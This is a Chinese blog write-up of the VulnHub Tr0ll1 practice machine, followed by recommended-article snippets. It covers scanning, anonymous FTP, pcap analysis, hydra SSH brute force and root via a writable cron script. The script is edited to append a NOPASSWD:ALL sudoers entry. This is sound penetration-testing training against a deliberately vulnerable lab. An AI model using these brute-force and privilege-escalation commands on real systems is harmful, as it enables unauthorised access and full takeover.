Tr0ll1靶机详解

最新推荐文章于 2025-06-04 19:20:27 发布
最新推荐文章于 2025-06-04 19:20:27 发布
阅读量288 收藏 8
点赞数 5
文章标签: linux 运维 web安全 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43433141/article/details/146340217
版权

一、主机发现

arp-scan -l

靶机ip为192.168.55.155

二、端口扫描、目录遍历、指纹识别

2.1端口扫描

nmap -p- 192.168.55.155

发现该靶机的ftp端口开放,可能能直接进行连接

2.2目录遍历

dirb http://192.168.55.155

找到了两个敏感目录

2.3指纹识别

nmap 192.168.55.155 -sV -sC -O --version-all

说明ftp可以进行弱口令进入

三、靶机网页进行信息收集,拿下低权限用户

进入靶机网页,发现只有一张图片

访问了dirb扫描出来的敏感路径,发现也没有很多信息,尝试ftp连接

弱口令:

anonymous
guest

将该文件下载到kali本机中,然后使用wireshark打开

打开后容易发现这是一个tcp三次握手过程

追踪该流,发现获取了secret_stuff.txt文件

追踪另一个流,发现需要进入该目录下查找信息

注:由于是分析其中的内容,也可以使用strings直接进行打开

strings lol.pcap 

访问该url,找到了新的信息

打开此文件,发现是32位的可执行文件

可以使用binwalk进行查看其中是不是有捆绑文件

binwalk roflmao

无捆绑文件,可以使用strings进行查看了

靶机提示需要找到这个地址才能继续进行,访问一下试试

发现有两个目录

第一个目录下的文件感觉是账号

第二个目录下的文件就一个,看文件名应该是密码

使用hydra进行暴力破解

一直爆破不成功,发现密码不是Good_job_:),而是Pass.txt,离谱啊

hydra -L 2.txt -p Pass.txt 192.168.55.155 ssh

使用账号密码进行登陆

成功拿下低权限shell

四、定时任务提权

注:此靶机一定时间后会自动退出

使用python升级shell环境

python -c 'import pty;pty.spawn("/bin/bash")'

4.1靶机信息收集

uname -a

4.2写入定时任务进行提权

由于在tmp目录中下载的提权辅助工具被删除,想到该靶机可能存在定时任务

查找定时任务

find / -name cronlog 2>/dev/null

然后寻找该文件的位置

find / -name cleaner.py 2>/dev/null

随后查看一下该文件的内容

cat /lib/log/cleaner.py

使用vi将提权命令写入该脚本中

这个文件可以执行系统指令os.system,会每两分钟执行对目录/tmp的删除,那么我们只要把os.system()中的指令修改为:

'echo "overflow All=(All)NOPASSWD:ALL" >> /etc/sudoers'

即可相当于为overflow用户追加了最高ALL权限,等待最多两分钟后,再次运行sudo -l,即可发现overflow的用户变为了最高权限

然后启动root用户的shell

提权成功!

泷羽Sec-pp
关注
VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 738
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
CTF之Tr0ll1 靶机渗透(FTP匿名登录 SSH爆破)
afei001
12-06 772
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.对端口进行全扫描 4.FTP匿名登录,探测信息 5.尝试爆破SSH 6.内核漏洞提权,拿下flag 总结 练习环境 攻击机:kali 靶机Tr0ll: 1 下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar 1.发现靶机,端口扫描 root@kali:~# nmap -sV -O 100.100.100.14 Starting Nma...
红队打靶:Troll1打靶思路详解(vulnhub)
Bossfrank的博客
07-06 1344
本文是vulnhub靶机Troll的详细打靶过程。涉及到的知识点包括FTP匿名登录、strings命令、密码喷射crackmapexec、定时任务提权等。靶机本身不复杂,但关键是有一些命令的操作。包括strings查看文件的文本信息、binwalk查看捆绑文件、file命令查看文件信息。如果不使用这些命令,可能会遗漏很多重要信息。
VulnHub-Tr0ll1靶机学习笔记与文档整理
资源摘要信息:"VulnHub-Tr0ll1.zip文件是一个包含了VulnHub-Tr0ll1靶机学习笔记及相关文档的压缩包。VulnHub是一个为安全研究人员和爱好者提供真实网络环境的平台,用于实践渗透测试技能。Tr0ll1是VulnHub上的一个...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
C语言实现编辑原理中LL1算法详解
标题中提到的“编辑原理LL1算法”指的是LL(1)语法分析算法,这是一种自顶向下的语法分析方法,用于在编译器中分析程序的语法结构。LL(1)算法的“LL”表示自左向右扫描输入串,并且使用最左推导进行分析,而数字“1”...
LinuxLinux 环境变量
最新发布
Antonio915的博客
06-04 641
每个程序都会收到一张环境表,环境表是一个字符指针数组,每个指针指向一个以’\0’结尾的环境字符串。
Rock9.x(Linux)安装Redis7
{竹子}
05-31 499
设置后台运行:将daemonize no改为daemonize yes。gcc 是C语言编译器,Redis是用C语言开发的,我们需要编译它。如果没有安装gcc,那么我们手动安装。在解压目录运行命令,必须写sudo。创建存放配置文件的文件夹。解压,进入解压文件夹。
19-项目部署(Linux)
2301_80368429的博客
06-03 1145
不同领域的主流操作系统,主要分为以下这么几类: 桌面操作系统、服务器操作系统、移动设备操作系统、嵌入式操作系统。接下来,这几个领域中,代表性的操作系统是那些?1). 桌面操作系统操作系统特点Windows用户数量最多MacOS操作体验好,办公人士首选Linux用户数量少(桌面操作系统,Linux使用较少)2). 服务器操作系统操作系统特点Unix安全、稳定、付费Linux安全、稳定、免费、占有率高付费、占有率低3). 移动设备操作系统操作系统特点Android。
Linux | Shell脚本的基础知识
2302_81507127的博客
05-29 848
执行一条命令完毕后,系统会给出一个退出值,若成功则为0,出现错误则1~255退出状态码是一个整数,其有效范围为0~255行为良好的UNIX命令,程序和工具都会返回0作为退出码来表示成功。
Linux --进程优先级
2301_79389054的博客
06-03 494
摘要:进程优先级是Linux调度资源的关键机制,通过PRI和NI值控制进程执行顺序。PRI越小优先级越高,NI(-2019)用于修正PRI值。Linux采用O(1)调度算法,使用active/expired队列和bitmap快速定位待执行进程,当活跃队列耗尽时交换指针。进程切换通过保存/恢复PCB中的上下文数据实现,而task_struct的链表设计允许进程存在于多队列中。通过offsetof宏可计算结构体成员偏移量,实现从链表节点访问完整进程数据。该机制确保调度效率不受进程数量影响。
Linux远程数据同步——rsync命令详解
想进步的职场菜鸟。
05-30 773
rsync是强大的远程数据同步工具,采用差异算法提升传输效率。本文详解参数用法,提供本地/远程同步示例,涵盖权限保留、进度显示等核心功能。
Linux之文件&进程间通信&信号
Steve__evetS的博客
05-30 948
Linux之文件&进程间通信&信号 文件 文件描述符 文件操作 重定向 缓冲区 一切皆文件的理解 文件系统 磁盘物理结构&块 文件系统结构 软硬链接 进程间通信 匿名管道 命名管道 system V共享内存 信号
通讯录Linux的实现
qq_36545519的博客
06-02 411
person结构体 通讯录 含 person结构体 person数量更占用空间但是更快 使用寄存器 失败情况: 因为缺少续行符** 续行符** 续完行后宏定义可以使用 但是由于中间出现分号 有分号导致 if else无法链接 所以为了摆脱分号分开影响 使用do while(0);即可 do while(0);需要加一个分号! do while(0) person结构体 //结构体人包含联系人信息 struct person{ char name[NAME_LENGTH]; char phone[PHON
Linux531rsync定时同步 再回忆
czhc1140075663的博客
05-31 534
rsync由于要设置定时同步,所以要配置DNS,时钟完全同步。
OS10.【Linux】yum命令
zhangcoder的博客 记录学习轨迹~
06-01 930
Linux系统中的软件安装方法,重点讲解了yum包管理器的使用。主要内容包括: 软件安装方法: 直接编译源代码(较复杂) 使用yum等包管理器(推荐) yum常用命令: yum list:查看软件包 yum install/remove:安装/卸载软件 其他命令:yum search/makecache/update/upgrade 扩展yum源: 安装epel-release扩展源 通过扩展源安装sl小火车等软件 yum源管理: 配置文件位置:/etc/yum.re
Linux shell练习题
专注“目标检测”领域技术分享
06-03 265
2. 判断~/bigdata.txt 是否存在,若已存在则 进行删除该文件 然后打印出 ”该文件已存在,已被删除“,如不存在 则创建文件,然后输出打印:”该文件不存在,已创建“1. 判断~/bigdata.txt 是否存在,若已存在则打印出”该文件已存在“,如不存在,则输出打印:”该文件不存在“8.将 / 目录下的详细信息写入到文件 tong.log 中,然后打印该文件中的文件名和大小。9.统计~/目录下所有小于1MB的文件数量。7.计算1的阶乘到10的阶乘的累加值。
34.1STM32下的can总线实现知识(区分linux)_csdn
m0_66676819的博客
06-04 632
我们以STM32F103C8T6为例实现基本的驱动!下面的主流通信协议在之前的文章中也讲过!可以明显看出遥控帧和数据帧的区别!遥控帧的RTR1,数据帧的RTR0,而且遥控帧没有数据段!如果有设备需要的话,首先接收方会发出一个遥控帧,遥控帧会包含报文ID,遥控帧也是广播式的,每个设备都能收到遥控帧,如果其中有个设备有这个ID的数据,那么这个设备就会把数据帧通过广播出来,然后真正需要的接收方就会收到数据。(适合使用频率低的数据传输)!:如果使用频率高,这种遥控帧请求式就不合适了!
Linux上安装MongoDB
xike1024的博客
05-30 1456
mongodb安装与登陆
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值